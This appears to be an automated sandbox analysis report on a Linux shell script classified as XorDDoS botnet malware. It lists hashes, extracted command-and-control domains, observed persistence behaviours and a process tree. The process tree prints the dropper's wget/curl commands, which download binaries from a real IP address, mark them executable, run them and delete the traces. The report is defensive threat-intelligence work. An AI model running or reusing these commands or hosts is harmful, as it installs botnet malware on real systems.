Analysis
-
max time kernel
149s -
max time network
147s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
-
submitted
23-12-2024 02:24
General
-
Target
ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4.sh
-
Size
318B
-
MD5
0368897400a135549c0a2d9d83d384cc
-
SHA1
29c933b2a8dd201b4aaea73789664dda02c2fe75
-
SHA256
ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4
-
SHA512
00216c30c5ab73b63821846febd159ac0be3c5a6658921ce9753c858ff2f83d698518c67283a9b2bea9da6067698b1302b6d84bf65ada476aba60bc35eedd758
Malware Config
Extracted
xorddos
api.markerbio.com:112
api.enoan2107.com:112
http://qq.com/lib.asp
-
crc_polynomial
CDB88320
Signatures
-
XorDDoS
Botnet and downloader malware targeting Linux-based operating systems and IoT devices.
-
XorDDoS payload 3 IoCs
-
Xorddos family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Deletes itself 64 IoCs
-
Executes dropped EXE 64 IoCs
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies init.d 2 TTPs 1 IoCs
Adds/modifies system service, likely for persistence.
-
Writes file to system bin folder 64 IoCs
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to shm directory 3 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
-
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4.sh/tmp/ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4.sh1⤵
-
/usr/bin/wgetwget http://43.249.172.195:888/1122⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://43.249.172.195:888/1122⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x 1122⤵
- File and Directory Permissions Modification
-
-
/tmp/112./1122⤵
- Deletes itself
- Executes dropped EXE
- Writes file to system bin folder
-
-
/usr/bin/wgetwget http://43.249.172.195:888/112s2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://43.249.172.195:888/112s2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x 112s2⤵
- File and Directory Permissions Modification
-
-
/tmp/112s./112s2⤵
- Executes dropped EXE
- Writes file to system bin folder
-
-
/bin/rmrm -rf 112.sh2⤵
-
-
/bin/rmrm -rf 1122⤵
-
-
/bin/rmrm -rf 112s2⤵
-
-
/bin/inozangnrzdju/bin/inozangnrzdju1⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Enumerates active TCP sockets
- Modifies init.d
- Writes file to system bin folder
- Reads system network configuration
- Reads runtime system information
- Writes file to shm directory
-
/bin/bhduseyqbtjl/bin/bhduseyqbtjl -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/erowob/bin/erowob -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/igjonr/bin/igjonr -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/vnbnodzuizbgn/bin/vnbnodzuizbgn -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/jptafr/bin/jptafr -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/ploepnyzoz/bin/ploepnyzoz -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/gyzojpbai/bin/gyzojpbai -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/buvmlqpqhgzf/bin/buvmlqpqhgzf -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/pqxttfu/bin/pqxttfu -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/rkoixmjnnprkm/bin/rkoixmjnnprkm -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/amtkffzpclzsbo/bin/amtkffzpclzsbo -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/ldoiflwrllj/bin/ldoiflwrllj -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/fwuemzrlrsbcfe/bin/fwuemzrlrsbcfe -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/sqctsr/bin/sqctsr -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/omdmfraoos/bin/omdmfraoos -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/rnbicggzksycfr/bin/rnbicggzksycfr -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/jvcpnsbteimexa/bin/jvcpnsbteimexa -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/gtmhdqokpaepem/bin/gtmhdqokpaepem -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/dvdfktzom/bin/dvdfktzom -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/wakvaibwwlbnbl/bin/wakvaibwwlbnbl -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/bsuigcl/bin/bsuigcl -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/gsnzrbnw/bin/gsnzrbnw -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/ngvppzllkp/bin/ngvppzllkp -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/lafoubw/bin/lafoubw -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/dhdjzrksuxpum/bin/dhdjzrksuxpum -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/xiyqdlt/bin/xiyqdlt1⤵
- Deletes itself
- Executes dropped EXE
- Writes file to shm directory
-
/bin/scmrpadeao/bin/scmrpadeao -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/hcdibemij/bin/hcdibemij -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/kakcxhttupl/bin/kakcxhttupl -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/bendhsevblaew/bin/bendhsevblaew -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/ikluhxwr/bin/ikluhxwr -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/tbtnxkyvo/bin/tbtnxkyvo -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/irmcxidjk/bin/irmcxidjk -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/hnuraoyylsy/bin/hnuraoyylsy -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/vttsgupuz/bin/vttsgupuz -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/llejvjuhtb/bin/llejvjuhtb -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/ouvcstnmtujo/bin/ouvcstnmtujo -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/dulsok/bin/dulsok -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/cyynthjbbmx/bin/cyynthjbbmx -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/xweriy/bin/xweriy -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/gstanjpif/bin/gstanjpif -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/wchpeuatd/bin/wchpeuatd -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/ssmsszmakpdw/bin/ssmsszmakpdw -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/uccyvm/bin/uccyvm -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/dgppzjqlla/bin/dgppzjqlla -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/qyomaxchsea/bin/qyomaxchsea -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/kwbouwcrcii/bin/kwbouwcrcii -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/htkufmwvl/bin/htkufmwvl -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/inkmueqx/bin/inkmueqx -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/ctgsod/bin/ctgsod -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/hfdrykkkhpxdn/bin/hfdrykkkhpxdn -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/svvdhsjzp/bin/svvdhsjzp -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/civwyyrh/bin/civwyyrh -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/uygglqn/bin/uygglqn -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/navcrzmmvlnm/bin/navcrzmmvlnm -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/ntpxlmvq/bin/ntpxlmvq -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/kgxagjmbbkodf/bin/kgxagjmbbkodf -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/uivapgr/bin/uivapgr -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/ugejbrwqmqy/bin/ugejbrwqmqy -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/rppkuzst/bin/rppkuzst -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/yeqbgapjhhgnm/bin/yeqbgapjhhgnm -d 15381⤵
- Deletes itself
- Executes dropped EXE
-
/bin/pboqbs/bin/pboqbs -d 15381⤵
- Deletes itself
-
/bin/odlgrdhyuwng/bin/odlgrdhyuwng -d 15381⤵
- Deletes itself
-
/bin/dyiskpcqcof/bin/dyiskpcqcof -d 15381⤵
-
/bin/tszlvglsfby/bin/tszlvglsfby -d 15381⤵
-
/bin/qbnidgrggzaq/bin/qbnidgrggzaq -d 15381⤵
-
/bin/citspmmhozdu/bin/citspmmhozdu -d 15381⤵
-
/bin/vblvbdxo/bin/vblvbdxo -d 15381⤵
-
/bin/cwdidckvtngn/bin/cwdidckvtngn -d 15381⤵
-
/bin/ddnqaqu/bin/ddnqaqu -d 15381⤵
-
/bin/vbtdpsi/bin/vbtdpsi -d 15381⤵
-
/bin/fgbdllgp/bin/fgbdllgp -d 15381⤵
-
/bin/ejlkyqfzkkres/bin/ejlkyqfzkkres -d 15381⤵
-
/bin/jxqayhu/bin/jxqayhu -d 15381⤵
-
/bin/oczrpmaeigp/bin/oczrpmaeigp -d 15381⤵
-
/bin/qnmxpyigcc/bin/qnmxpyigcc -d 15381⤵
-
/bin/sdlshvyxpq/bin/sdlshvyxpq -d 15381⤵
-
/bin/maboakkxym/bin/maboakkxym -d 15381⤵
-
/bin/bndbxjfcur/bin/bndbxjfcur -d 15381⤵
-
/bin/whegrbhfczi/bin/whegrbhfczi -d 15381⤵
-
/bin/tqitpzjd/bin/tqitpzjd -d 15381⤵
-
/bin/irblyhnzp/bin/irblyhnzp -d 15381⤵
-
/bin/yhdyqjalcej/bin/yhdyqjalcej -d 15381⤵
-
/bin/uhnnymycpxj/bin/uhnnymycpxj -d 15381⤵
-
/bin/xbfzmidxu/bin/xbfzmidxu -d 15381⤵
-
/bin/pxapeorwslffze/bin/pxapeorwslffze -d 15381⤵
-
/bin/slshvxepm/bin/slshvxepm -d 15381⤵
-
/bin/xijwrf/bin/xijwrf -d 15381⤵
-
/bin/onlvbctt/bin/onlvbctt -d 15381⤵
-
/bin/yboetmmeidjeyw/bin/yboetmmeidjeyw -d 15381⤵
-
/bin/frwliijxvwuyan/bin/frwliijxvwuyan -d 15381⤵
-
/bin/plvesqseu/bin/plvesqseu -d 15381⤵
-
/bin/kfgkcfrvbcgjnd/bin/kfgkcfrvbcgjnd -d 15381⤵
-
/bin/webimksopjls/bin/webimksopjls -d 15381⤵
-
/bin/jzfjmxzxufrk/bin/jzfjmxzxufrk -d 15381⤵
-
/bin/rbbwikvowhn/bin/rbbwikvowhn -d 15381⤵
-
/bin/hicyubwzcenmw/bin/hicyubwzcenmw -d 15381⤵
-
/bin/dhmvvgzwcjiyz/bin/dhmvvgzwcjiyz -d 15381⤵
-
/bin/fnboxdnt/bin/fnboxdnt -d 15381⤵
-
/bin/jsjohxmiduxy/bin/jsjohxmiduxy -d 15381⤵
-
/bin/dznfjvficnxdbw/bin/dznfjvficnxdbw -d 15381⤵
-
/bin/oqrakcqsaccf/bin/oqrakcqsaccf -d 15381⤵
-
/bin/zdpefemoc/bin/zdpefemoc -d 15381⤵
-
/bin/yeewjguuw/bin/yeewjguuw -d 15381⤵
-
/bin/mwxompqrt/bin/mwxompqrt -d 15381⤵
-
/bin/rvbhzg/bin/rvbhzg -d 15381⤵
-
/bin/bsxpqwgflwwfup/bin/bsxpqwgflwwfup -d 15381⤵
-
/bin/xwbdmrzbyvxlo/bin/xwbdmrzbyvxlo -d 15381⤵
-
/bin/nwphuvlqft/bin/nwphuvlqft -d 15381⤵
-
/bin/fbhzaxpxduiz/bin/fbhzaxpxduiz -d 15381⤵
-
/bin/pvirsgvx/bin/pvirsgvx -d 15381⤵
-
/bin/mwumut/bin/mwumut -d 15381⤵
-
/bin/izejgdjdtg/bin/izejgdjdtg -d 15381⤵
-
/bin/priiifqcywzvr/bin/priiifqcywzvr -d 15381⤵
-
/bin/ulzogwwfbhl/bin/ulzogwwfbhl -d 15381⤵
-
/bin/qrzzzpqhz/bin/qrzzzpqhz -d 15381⤵
-
/bin/npcnnbk/bin/npcnnbk -d 15381⤵
-
/bin/oernuzmsen/bin/oernuzmsen -d 15381⤵
-
/bin/stqlvrkmhu/bin/stqlvrkmhu -d 15381⤵
-
/bin/hhcmwpngw/bin/hhcmwpngw -d 15381⤵
-
/bin/nnrhpfctsbnoty/bin/nnrhpfctsbnoty -d 15381⤵
-
/bin/klxtfidompkdcs/bin/klxtfidompkdcs -d 15381⤵
-
/bin/gfpapefrzaupo/bin/gfpapefrzaupo -d 15381⤵
-
/bin/pzaayufixtumdx/bin/pzaayufixtumdx -d 15381⤵
-
/bin/wzxdozsuglvg/bin/wzxdozsuglvg -d 15381⤵
-
/bin/kwuaxua/bin/kwuaxua -d 15381⤵
-
/bin/qidnbxbfxs/bin/qidnbxbfxs -d 15381⤵
-
/bin/wrimqbiwodf/bin/wrimqbiwodf -d 15381⤵
-
/bin/qbqqzlsudayrc/bin/qbqqzlsudayrc -d 15381⤵
-
/bin/ujwmoudwgvzqso/bin/ujwmoudwgvzqso -d 15381⤵
-
/bin/xikazczmwwpx/bin/xikazczmwwpx -d 15381⤵
-
/bin/ibvfms/bin/ibvfms -d 15381⤵
-
/bin/amxyvsy/bin/amxyvsy -d 15381⤵
-
/bin/mohlyt/bin/mohlyt -d 15381⤵
-
/bin/xxnluj/bin/xxnluj -d 15381⤵
-
/bin/rfnubsgtmihjg/bin/rfnubsgtmihjg -d 15381⤵
-
/bin/bgsouzztvls/bin/bgsouzztvls -d 15381⤵
-
/bin/zgmkjfqyztrfo/bin/zgmkjfqyztrfo -d 15381⤵
-
/bin/nvmwap/bin/nvmwap -d 15381⤵
-
/bin/udzvfuqsm/bin/udzvfuqsm -d 15381⤵
-
/bin/tsxeddwcepv/bin/tsxeddwcepv -d 15381⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Boot or Logon Initialization Scripts
1RC Scripts
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
1Boot or Logon Initialization Scripts
1RC Scripts
1Scheduled Task/Job
1Cron
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
549KB
MD544e54a1d9c958efe80765c119a56e00f
SHA1430d9c33fc99125286f3f2e058fe0c57afdf9843
SHA2566b1dc36fd3a90d279d27c6f68ef024689edb06277e6653d8bf4fdf3d082f888d
SHA51273a0483fbfe110b62b507c819448945a0482539195ff603d60d9725045ba9fd33b95b56f68eb390a8b450d266382f198b41fcca6081ac5cc7e372189e4fe06d5
-
Filesize
549KB
MD58dbd1b4dab6437cb2b667d1e00a4bca1
SHA198f346ce6de11f160289ec242692abcb785925c5
SHA256723018fcb2a0d6f4c6904fc438631f39c8d2140cefa70f910798e6a542c6c646
SHA512f11ed227995b8530510146b909305c18213be78d8efc1f7f8d57021cbfdef768d39044db856c48b85fb83986f9921acd853ae067cacd42a6b18e6b27d0b09dc1
-
Filesize
16B
MD5076933ff9904d1110d896e2c525e39e5
SHA14188442577fa77f25820d9b2d01cc446e30684ac
SHA2564cbbd8ca5215b8d161aec181a74b694f4e24b001d5b081dc0030ed797a8973e0
SHA5126fcee9a7b7a7b821d241c03c82377928bc6882e7a08c78a4221199bfa220cdc55212273018ee613317c8293bb8d1ce08d1e017508e94e06ab85a734c99c7cc34
-
Filesize
150B
MD5cd9ee8b826370ca72b509cd4de9a7f05
SHA1561d6503044e1739c20c7f8c6b84ad04a3492475
SHA2561f8220dc5c47d15b18416ba30d7c9dd2276f0f7e6a3377465f894dce37357fe4
SHA5124a60016765d8f49be9a224a563c378bfd6ea434546820d7e7779c96ce90edf12abace5a0561a243c7380de56bacd995801a2c351994553ff97e107c06c1ea099
-
Filesize
32B
MD594d28f5fa8bb8623bc2ce6fcf961db38
SHA10212496ed6e98f2304a7ad2c33b4e0210daf295f
SHA2565556b3cf82392707226fff3ebc50a0dbbcc5624e5116285b7e1bdeb5f1a5580a
SHA512f78e45c7a96be344de11704e6bf1909704062a87b7856ac0fe36dbac9e7a1a63bbf42f25ca2114f96886a44f35ceb3ac6b2c5825af16b5a05330502187b556e0
-
Filesize
353B
MD53c8d1bda4280dcc1dc1b3ca8a1fc2a34
SHA1f55656a591d5ca2c745bc4c7312c23987323feb7
SHA25600e192518bf9c37e35b3f5f65f2f6091cb2b941fbc16e8c24733c7afbd0feec8
SHA512dcfa385a379146d312e6f8de4a995d6d883e47118709cdc592c272835e3256df2e11d5b4ac77db6d9120d070fc8832b6abd249c91c10c09af69d6c106288fc3e
-
Filesize
549KB
MD5f9191bab1e834d4aef3380700639cee9
SHA19c20269df6694260a24ac783de2e30d627a6928a
SHA256ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73
SHA5123d2758fe2d06183e627b5cc24919c08c84108f2efd7ab0a162029d55537476410d9535d50f3eb059f7153f7482c134284862eea121201f82838aace4b12283b5